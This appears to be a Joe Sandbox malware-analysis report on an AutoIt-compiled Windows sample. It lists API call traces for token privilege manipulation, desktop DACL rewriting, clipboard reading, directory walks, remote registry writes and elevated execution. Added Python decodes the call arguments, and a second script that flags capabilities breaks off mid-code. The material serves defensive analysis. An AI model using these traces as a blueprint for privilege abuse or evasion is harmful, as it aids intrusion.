  • Part of subcall function 004F9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004F93E3
  • Part of subcall function 004F9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004F9410
  • Part of subcall function 004F9399: GetLastError.KERNEL32 ref: 004F941D
• _memset.LIBCMT ref: 004F8F71
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004F8FC3
• CloseHandle.KERNEL32(?), ref: 004F8FD4
• OpenWindowStationW.USER32(winsta0,00000000,00060000,?,?,?,00000001,?,?), ref: 004F8FEB
• GetProcessWindowStation.USER32 ref: 004F9004
• SetProcessWindowStation.USER32(00000000), ref: 004F900E
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004F9028
  • Part of subcall function 004F8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004F8F27), ref: 004F8DFE
  • Part of subcall function 004F8DE9: CloseHandle.KERNEL32(?,?,004F8F27), ref: 004F8E10
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $default$winsta0
• API String ID: 2063423040-1027155976
• Opcode ID: 631c4ffbdfe15afab5f9805307e7a6b09a62b6610f6fe57af98a7d8cea62080f
• Instruction ID: dd6ee244520c8728730a2f572600f69697d51f4f03e72746345c0db3b2b4e6ad
• Opcode Fuzzy Hash: 631c4ffbdfe15afab5f9805307e7a6b09a62b6610f6fe57af98a7d8cea62080f
• Instruction Fuzzy Hash: 6D814C7190020DBFEF119FA4CE49AFF7B79EF04304F14412AFA10A62A1D7398E199B64
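The hex arguments in the listing above only become meaningful once they are mapped back to Win32 constants: 00060000 and 00060081 are access masks, and the 00000002/00000001 pair passed to DuplicateTokenEx is an impersonation level and a token type. The Python below is an editor's example added to this page, not Joe Sandbox code. Its constant tables are the documented Win32 values; the argument tuples in SAMPLES are copied as printed from this function and from the CreateFileW subcall in the directory-walk listing further down the page. Which stack slot holds which parameter follows each API's documented prototype; anything beyond the prototype's arity is stack noise that the report prints and the decoders ignore.

```python
"""Decode the numeric stack arguments Joe Sandbox prints for token, window-station and file calls.

Added example for this report, not Joe Sandbox code. Constant tables hold the documented
Win32 values; SAMPLES are argument tuples copied as printed from the listings on this page.
"""

STANDARD_RIGHTS = {
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL", 0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER", 0x00100000: "SYNCHRONIZE",
}
WINSTA_RIGHTS = {
    0x0001: "WINSTA_ENUMDESKTOPS", 0x0002: "WINSTA_READATTRIBUTES", 0x0004: "WINSTA_ACCESSCLIPBOARD",
    0x0008: "WINSTA_CREATEDESKTOP", 0x0010: "WINSTA_WRITEATTRIBUTES", 0x0020: "WINSTA_ACCESSGLOBALATOMS",
    0x0040: "WINSTA_EXITWINDOWS", 0x0100: "WINSTA_ENUMERATE", 0x0200: "WINSTA_READSCREEN",
}
DESKTOP_RIGHTS = {
    0x0001: "DESKTOP_READOBJECTS", 0x0002: "DESKTOP_CREATEWINDOW", 0x0004: "DESKTOP_CREATEMENU",
    0x0008: "DESKTOP_HOOKCONTROL", 0x0010: "DESKTOP_JOURNALRECORD", 0x0020: "DESKTOP_JOURNALPLAYBACK",
    0x0040: "DESKTOP_ENUMERATE", 0x0080: "DESKTOP_WRITEOBJECTS", 0x0100: "DESKTOP_SWITCHDESKTOP",
}
GENERIC_RIGHTS = {
    0x10000000: "GENERIC_ALL", 0x20000000: "GENERIC_EXECUTE",
    0x40000000: "GENERIC_WRITE", 0x80000000: "GENERIC_READ",
}
FILE_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                      4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS_AND_ATTRS = {
    0x00000001: "FILE_ATTRIBUTE_READONLY", 0x00000002: "FILE_ATTRIBUTE_HIDDEN",
    0x00000004: "FILE_ATTRIBUTE_SYSTEM", 0x00000010: "FILE_ATTRIBUTE_DIRECTORY",
    0x00000020: "FILE_ATTRIBUTE_ARCHIVE", 0x00000080: "FILE_ATTRIBUTE_NORMAL",
    0x00000100: "FILE_ATTRIBUTE_TEMPORARY", 0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x10000000: "FILE_FLAG_RANDOM_ACCESS",
    0x20000000: "FILE_FLAG_NO_BUFFERING", 0x40000000: "FILE_FLAG_OVERLAPPED",
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
}
IMPERSONATION_LEVEL = {0: "SecurityAnonymous", 1: "SecurityIdentification",
                       2: "SecurityImpersonation", 3: "SecurityDelegation"}
TOKEN_TYPE = {1: "TokenPrimary", 2: "TokenImpersonation"}


def hexarg(s: str):
    """The report prints stack slots as 8 hex digits; '?' means it could not recover the value."""
    s = s.strip()
    return None if s == "?" else int(s, 16)


def decode_mask(value, *tables) -> list:
    """Name each set bit using the given tables (low bit first); unknown bits are kept as hex."""
    if value is None:
        return ["?"]
    names, rest = [], value
    for bit, name in sorted((b, n) for t in tables for b, n in t.items()):
        if rest & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return names


def decode_open_window_station(args) -> dict:
    # OpenWindowStationW(lpszWinSta, fInherit, dwDesiredAccess)
    return {"name": args[0], "access": decode_mask(hexarg(args[2]), STANDARD_RIGHTS, WINSTA_RIGHTS)}


def decode_open_desktop(args) -> dict:
    # OpenDesktopW(lpszDesktop, dwFlags, fInherit, dwDesiredAccess)
    return {"name": args[0], "access": decode_mask(hexarg(args[3]), STANDARD_RIGHTS, DESKTOP_RIGHTS)}


def decode_duplicate_token_ex(args) -> dict:
    # DuplicateTokenEx(hExistingToken, dwDesiredAccess, lpTokenAttributes, ImpersonationLevel, TokenType, phNewToken)
    access = hexarg(args[1])  # zero is documented as "same access as the existing token"
    return {
        "desired_access": "same as source token" if access == 0 else decode_mask(access, STANDARD_RIGHTS),
        "impersonation": IMPERSONATION_LEVEL.get(hexarg(args[3]), "?"),
        "token_type": TOKEN_TYPE.get(hexarg(args[4]), "?"),
    }


def decode_create_file(args) -> dict:
    # CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
    #             dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile)
    return {
        "access": decode_mask(hexarg(args[1]), GENERIC_RIGHTS, STANDARD_RIGHTS),
        "share": decode_mask(hexarg(args[2]), FILE_SHARE),
        "disposition": CREATE_DISPOSITION.get(hexarg(args[4]), "?"),
        "flags": decode_mask(hexarg(args[5]), FILE_FLAGS_AND_ATTRS),
    }


DECODERS = {
    "DuplicateTokenEx": decode_duplicate_token_ex,
    "OpenWindowStationW": decode_open_window_station,
    "OpenDesktopW": decode_open_desktop,
    "CreateFileW": decode_create_file,
}

# Argument tuples exactly as printed in this report's listings.
SAMPLES = {
    "DuplicateTokenEx": ("?", "00000000", "00000000", "00000002", "00000001", "?", "?", "?", "?", "00000001", "?", "?"),
    "OpenWindowStationW": ("winsta0", "00000000", "00060000", "?", "?", "?", "00000001", "?", "?"),
    "OpenDesktopW": ("default", "00000000", "00000000", "00060081"),
    "CreateFileW": ("?", "40000000", "00000001", "00000000", "00000003", "02000080", "00000000"),
}


def decode_all(samples=SAMPLES) -> dict:
    return {api: DECODERS[api](args) for api, args in samples.items()}


if __name__ == "__main__":
    for api, decoded in decode_all().items():
        print(api, decoded)
```

Decoded, the function opens winsta0 with READ_CONTROL | WRITE_DAC and the default desktop with READ_CONTROL | WRITE_DAC | DESKTOP_READOBJECTS | DESKTOP_WRITEOBJECTS, after duplicating a token as a primary token at SecurityImpersonation level. Reading and rewriting the DACLs of the interactive window station and desktop is the usual preparation for launching a process under another account's token so that it can draw on that desktop, which is consistent with the privilege adjustment the subcalls perform. The CreateFileW decode (GENERIC_WRITE, FILE_SHARE_READ, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_BACKUP_SEMANTICS) is the handle type needed to open a directory as well as a file for writing metadata such as timestamps; FILE_FLAG_BACKUP_SEMANTICS is what lets CreateFileW open a directory at all.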
APIs
• OpenClipboard.USER32(00530980), ref: 0051465C
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0051466A
• GetClipboardData.USER32(0000000D), ref: 00514672
• CloseClipboard.USER32 ref: 0051467E
• GlobalLock.KERNEL32(00000000), ref: 0051469A
• CloseClipboard.USER32 ref: 005146A4
• GlobalUnlock.KERNEL32(00000000), ref: 005146B9
• IsClipboardFormatAvailable.USER32(00000001), ref: 005146C6
• GetClipboardData.USER32(00000001), ref: 005146CE
• GlobalLock.KERNEL32(00000000), ref: 005146DB
• GlobalUnlock.KERNEL32(00000000), ref: 0051470F
• CloseClipboard.USER32(00000001,00000000), ref: 0051481F
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
• String ID:
• API String ID: 3222323430-0
• Opcode ID: 8abe59dd7db2774bba4e06ffd5b8e77365f04d31b4a045a3b2d56a3d78a73b87
• Instruction ID: 4415b7a58aae2720ef24c0efd4626d4d3224982136af3aaae466447d6ddacd02
• Opcode Fuzzy Hash: 8abe59dd7db2774bba4e06ffd5b8e77365f04d31b4a045a3b2d56a3d78a73b87
• Instruction Fuzzy Hash: C851B331204301AFE300EF60DC6AFAE7BA8BB94B14F00152EF545D22E1DB7499499B66
APIs
• FindFirstFileW.KERNEL32(?,?,000BDFBA,?,00000000), ref: 0050F5F9
• _wcscmp.LIBCMT ref: 0050F60E
• _wcscmp.LIBCMT ref: 0050F625
• GetFileAttributesW.KERNEL32(?), ref: 0050F637
• SetFileAttributesW.KERNEL32(?,?), ref: 0050F651
• FindNextFileW.KERNEL32(00000000,?), ref: 0050F669
• FindClose.KERNEL32(00000000), ref: 0050F674
• FindFirstFileW.KERNEL32(*.*,?), ref: 0050F690
• _wcscmp.LIBCMT ref: 0050F6B7
• _wcscmp.LIBCMT ref: 0050F6CE
• SetCurrentDirectoryW.KERNEL32(?), ref: 0050F6E0
• SetCurrentDirectoryW.KERNEL32(0055B578), ref: 0050F6FE
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0050F708
• FindClose.KERNEL32(00000000), ref: 0050F715
• FindClose.KERNEL32(00000000), ref: 0050F727
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*$SP
• API String ID: 1803514871-4017590620
• Opcode ID: 72579e1fcade2beafeff30b8b814542a8c755e2183ad9a2caf342dffa5c1882a
• Instruction ID: 5fa665488becbc0728f03d2b21bc40975bdd4d1019b4429764afa7aca9ee1f16
• Opcode Fuzzy Hash: 72579e1fcade2beafeff30b8b814542a8c755e2183ad9a2caf342dffa5c1882a
• Instruction Fuzzy Hash: D231B175641219AADB209FB4DC5DAEF7BACFF19321F144166F805D21E0EB30DA48DB60
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0050CDD0
• FindClose.KERNEL32(00000000), ref: 0050CE24
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0050CE49
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0050CE60
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0050CE87
• __swprintf.LIBCMT ref: 0050CED3
• __swprintf.LIBCMT ref: 0050CF16
  • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
• __swprintf.LIBCMT ref: 0050CF6A
  • Part of subcall function 004C38C8: __woutput_l.LIBCMT ref: 004C3921
• __swprintf.LIBCMT ref: 0050CFB8
  • Part of subcall function 004C38C8: __flsbuf.LIBCMT ref: 004C3943
  • Part of subcall function 004C38C8: __flsbuf.LIBCMT ref: 004C395B
• __swprintf.LIBCMT ref: 0050D007
• __swprintf.LIBCMT ref: 0050D056
• __swprintf.LIBCMT ref: 0050D0A5
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 3953360268-2428617273
• Opcode ID: 6c56d2c88dc0a54240abd4414c6dbd10081a23978ae70b9542baba944f570164
• Instruction ID: cf6a0401baa72eff906a18f4f7ddbdbed13888a58caa0dda00023408c2868db8
• Opcode Fuzzy Hash: 6c56d2c88dc0a54240abd4414c6dbd10081a23978ae70b9542baba944f570164
• Instruction Fuzzy Hash: 4AA13BB1404304ABC710EFA5D995DAFB7ECBFD5708F40091EF58586191EB78EA08CB66
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00520FB3
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00530980,00000000,?,00000000,?,?), ref: 00521021
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00521069
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 005210F2
• RegCloseKey.ADVAPI32(?), ref: 00521412
• RegCloseKey.ADVAPI32(00000000), ref: 0052141F
Memory Dump Source
• Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
• Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 536824911-966354055
• Opcode ID: 9dcb82c1f47a19086c0ce8ffee1e6f478c9c22af55ab44474268055cd321de6d
• Instruction ID: f8412982cdcc9c1bfec60c1cbd37de5e5927969a0e4d80d39fb94d094c18981c
• Opcode Fuzzy Hash: 9dcb82c1f47a19086c0ce8ffee1e6f478c9c22af55ab44474268055cd321de6d
• Instruction Fuzzy Hash: EA028C75200A119FCB14EF25C855E2ABBE5FF99314F04885DF84A9B3A2CB38EC05CB95
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,000BDFBA,?,00000000), ref: 0050F756
                                                                            • _wcscmp.LIBCMT ref: 0050F76B
                                                                            • _wcscmp.LIBCMT ref: 0050F782
                                                                              • Part of subcall function 00504875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00504890
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0050F7B1
                                                                            • FindClose.KERNEL32(00000000), ref: 0050F7BC
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0050F7D8
                                                                            • _wcscmp.LIBCMT ref: 0050F7FF
                                                                            • _wcscmp.LIBCMT ref: 0050F816
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0050F828
                                                                            • SetCurrentDirectoryW.KERNEL32(0055B578), ref: 0050F846
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0050F850
                                                                            • FindClose.KERNEL32(00000000), ref: 0050F85D
                                                                            • FindClose.KERNEL32(00000000), ref: 0050F86F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*$jP
                                                                            • API String ID: 1824444939-1128680363
                                                                            • Opcode ID: 5cc675d6ee880f673e4ad2fc03ae2bcfe21d6bddb372deb6353e40c7afafa4a4
                                                                            • Instruction ID: f172295fe0e6c42e2639741262d248ab8b87ecd7b02b5617c59f1da181a2daed
                                                                            • Opcode Fuzzy Hash: 5cc675d6ee880f673e4ad2fc03ae2bcfe21d6bddb372deb6353e40c7afafa4a4
                                                                            • Instruction Fuzzy Hash: 2031F87650131A6ADB24AF74DC58ADF7B6CFF49321F108165F804A21E0E730DE49DB60
                                                                            APIs
                                                                              • Part of subcall function 004F8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?,00000000,00000000,00000000,?,?,004F8900,?,?,?), ref: 004F8E3C
                                                                              • Part of subcall function 004F8E20: GetLastError.KERNEL32(?,004F8900,?,?,?), ref: 004F8E46
                                                                              • Part of subcall function 004F8E20: GetProcessHeap.KERNEL32(00000008,?,?,004F8900,?,?,?), ref: 004F8E55
                                                                              • Part of subcall function 004F8E20: HeapAlloc.KERNEL32(00000000,?,004F8900,?,?,?), ref: 004F8E5C
                                                                              • Part of subcall function 004F8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?,?,004F8900,?,?,?), ref: 004F8E73
                                                                              • Part of subcall function 004F8EBD: GetProcessHeap.KERNEL32(00000008,004F8916,00000000,00000000,?,004F8916,?), ref: 004F8EC9
                                                                              • Part of subcall function 004F8EBD: HeapAlloc.KERNEL32(00000000,?,004F8916,?), ref: 004F8ED0
                                                                              • Part of subcall function 004F8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004F8916,?), ref: 004F8EE1
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004F8931
                                                                            • _memset.LIBCMT ref: 004F8946
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004F8965
                                                                            • GetLengthSid.ADVAPI32(?), ref: 004F8976
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 004F89B3
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004F89CF
                                                                            • GetLengthSid.ADVAPI32(?), ref: 004F89EC
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004F89FB
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004F8A02
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004F8A23
                                                                            • CopySid.ADVAPI32(00000000), ref: 004F8A2A
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004F8A5B
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004F8A81
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004F8A95
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3996160137-0
                                                                            • Opcode ID: d589117398da9c0ef3c64d65c2b1af5947cadc29a0043064ed41157dd235604a
                                                                            • Instruction ID: 52299992c7cd337d35f0361631358385457bd795e2b021cb722f16486666d003
                                                                            • Opcode Fuzzy Hash: d589117398da9c0ef3c64d65c2b1af5947cadc29a0043064ed41157dd235604a
                                                                            • Instruction Fuzzy Hash: 37614775900209EFDF05DFA1DC49EBEBB79FF04304F04812EEA15AA290DB399A14DB64
                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004B526C
                                                                            • IsDebuggerPresent.KERNEL32 ref: 004B527E
                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 004B52E6
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                              • Part of subcall function 004ABBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004ABC07
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004B5366
                                                                            • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 004F0B2E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004F0B66
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00556D10), ref: 004F0BE9
                                                                            • ShellExecuteW.SHELL32(00000000), ref: 004F0BF0
                                                                              • Part of subcall function 004B514C: GetSysColorBrush.USER32(0000000F), ref: 004B5156
                                                                              • Part of subcall function 004B514C: LoadCursorW.USER32(00000000,00007F00), ref: 004B5165
                                                                              • Part of subcall function 004B514C: LoadIconW.USER32(00000063), ref: 004B517C
                                                                              • Part of subcall function 004B514C: LoadIconW.USER32(000000A4), ref: 004B518E
                                                                              • Part of subcall function 004B514C: LoadIconW.USER32(000000A2), ref: 004B51A0
                                                                              • Part of subcall function 004B514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 004B51C6
                                                                              • Part of subcall function 004B514C: RegisterClassExW.USER32(?), ref: 004B521C
                                                                              • Part of subcall function 004B50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001,00568290,004B5328), ref: 004B5109
                                                                              • Part of subcall function 004B50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004B512A
                                                                              • Part of subcall function 004B50DB: ShowWindow.USER32(00000000), ref: 004B513E
                                                                              • Part of subcall function 004B50DB: ShowWindow.USER32(00000000), ref: 004B5147
                                                                              • Part of subcall function 004B59D3: _memset.LIBCMT ref: 004B59F9
                                                                              • Part of subcall function 004B59D3: Shell_NotifyIconW.SHELL32(00000000,?,?,?,00567A30), ref: 004B5A9E
                                                                            Strings
                                                                            • AutoIt, xrefs: 004F0B23
                                                                            • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 004F0B28
                                                                            • runas, xrefs: 004F0BE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                            • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                            • API String ID: 529118366-2030392706
                                                                            • Opcode ID: e07bcd399e917ed6e8fc31145ac99f3f9ee582e39eb02d6ad9b31ccf5a0463b3
                                                                            • Instruction ID: 50965546488f05445cf328cf4a467153962d7d7af77f912ef06091d66957e8eb
                                                                            • Opcode Fuzzy Hash: e07bcd399e917ed6e8fc31145ac99f3f9ee582e39eb02d6ad9b31ccf5a0463b3
                                                                            • Instruction Fuzzy Hash: D6510B3490424CAACF01ABF5DC35EFEBB74AB59348F10119BF951632A2CBA85509D739
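The per-function trace blocks on this page list the Win32 APIs each function calls, with the caller's subcalls marked and the call-site address after "ref:". The Python below is an added example, not part of the Joe Sandbox report: it parses those trace lines into records, counts API usage per function, and flags capability patterns of the kind the report's signature list names (IsDebuggerPresent, ShellExecuteW with the "runas" verb, the GetUserObjectSecurity/AddAce/SetUserObjectSecurity DACL rewrite, the FindFirstFileW/FindNextFileW directory walk, the DeleteFileW/MoveFileW sweep, RegConnectRegistryW). The rule table, its labels and the helper names are this example's own assumptions and are not Joe Sandbox's signature logic; the sample lines are copied (abridged) from the trace blocks of this report.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One trace line of a Joe Sandbox function block:
#   • [Part of subcall function XXXXXXXX: ]Api.MODULE(arg,arg,...), ref: XXXXXXXX
# LIBCMT entries such as "_wcscmp.LIBCMT ref: 0050F7FF" carry no argument list.
TRACE_RE = re.compile(
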